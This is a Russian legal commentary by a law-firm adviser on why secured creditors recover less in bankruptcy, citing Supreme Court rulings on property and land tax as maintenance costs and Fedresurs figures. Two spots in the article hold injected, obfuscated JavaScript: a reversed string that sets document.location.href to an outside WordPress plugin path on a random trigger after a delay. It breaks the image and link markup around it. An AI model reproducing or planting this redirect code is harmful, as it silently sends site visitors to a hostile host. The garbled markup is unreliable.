Почему ухудшается положение залоговых кредиторов

Комментарий Вадима Бородкина, советника Orchards, для Право.ru.

В случае банкротства должника залоговые кредиторы получают в разы больше, чем остальные, включенные в реестр. Но процент удовлетворенных требований начал падать. Все дело в том, что в расходы на содержание и реализацию активов стали включать долги по налогам, коммунальные платежи, расходы на охрану и ремонт. Такой подход судов ухудшил положение залоговых кредиторов. Эксперты прогнозируют, что в этом году шансов на полное удовлетворение требований станет еще меньше.

В процедуре банкротства у залогового кредитора есть некоторые преимущества. Например, он определяет процедуру и условия продажи предмета залога, а еще может рассчитывать на 70% от средств, вырученных от реализации предмета залога. В результате по итогам процедуры им удается получить больше остальных из реестра. Согласно статистике Федресурса, за 2021 год залоговые кредиторы обанкротившихся компаний смогли вернуть 22,2% своих долгов, в то время как остальным досталось намного меньше — лишь 3,5%.

Несмотря на свое преимущественное положение, залоговые кредиторы сталкиваются с проблемами, препятствующими полному удовлетворению их требований, признает Вадим Бородкин, советник Orchards. Среди них — затягивание реализации имущества оппонентами. 

Другая сложность связна с расходами на содержание и реализацию залогового имущества. Согласно п. 6 ст. 138 закона «О банкротстве» («Требования кредиторов по обязательствам, обеспеченным залогом имущества должника») такие затраты покрываются из средств, поступивших от реализации актива. 

Новой опасностью для залоговых кредиторов, по словам Бородкина, становится расширенное толкование п. 6 ст. 138 закона «О банкротстве». Дело в том, что в законе не конкретизируется понятие «расходы на обеспечение сохранности предмета залога и реализацию его на торгах», нет и предела, какая часть выручки от реализации актива может пойти на возмещение таких расходов. Как говорит Бородкин, этим и воспользовался Верховный суд. В определении от 8 апреля 2021 года по делу № А40-48943/2015 он указал, что до момента распределения денег залоговому кредитору нужно погасить требования, непосредственно связанные с предметом залога. А именно налог на имущество и земельный налог, начисленные на залоговое имущество за период процедуры. То есть СКЭС включила в состав расходов на содержание и реализацию предмета залога текущую задолженность должника по налогам. Аналогичную позицию экономколлегия отразила в решении по делу № А40-54774/2020.

Несомненно, указанные разъяснения ухудшили положение залоговых кредиторов, поскольку еще более понизились их шансы на полное удовлетворение своих требований.

Мнение эксперта подтверждают данные Федресурса. С 2019 по 2021 год упал процент удовлетворения требований залоговых кредиторов при банкротстве юрлиц с 29,5 до 22,2%.

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torage.pravo.ru/image/190/95197.png?v=1664023764″ alt=»»/>

В 2022 году следует ожидать дальнейшего снижения процента удовлетворения, прогнозирует Бородкин

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory/243024/»>Ссылка на статью>>

Подпишитесь на Telegram Orchards

X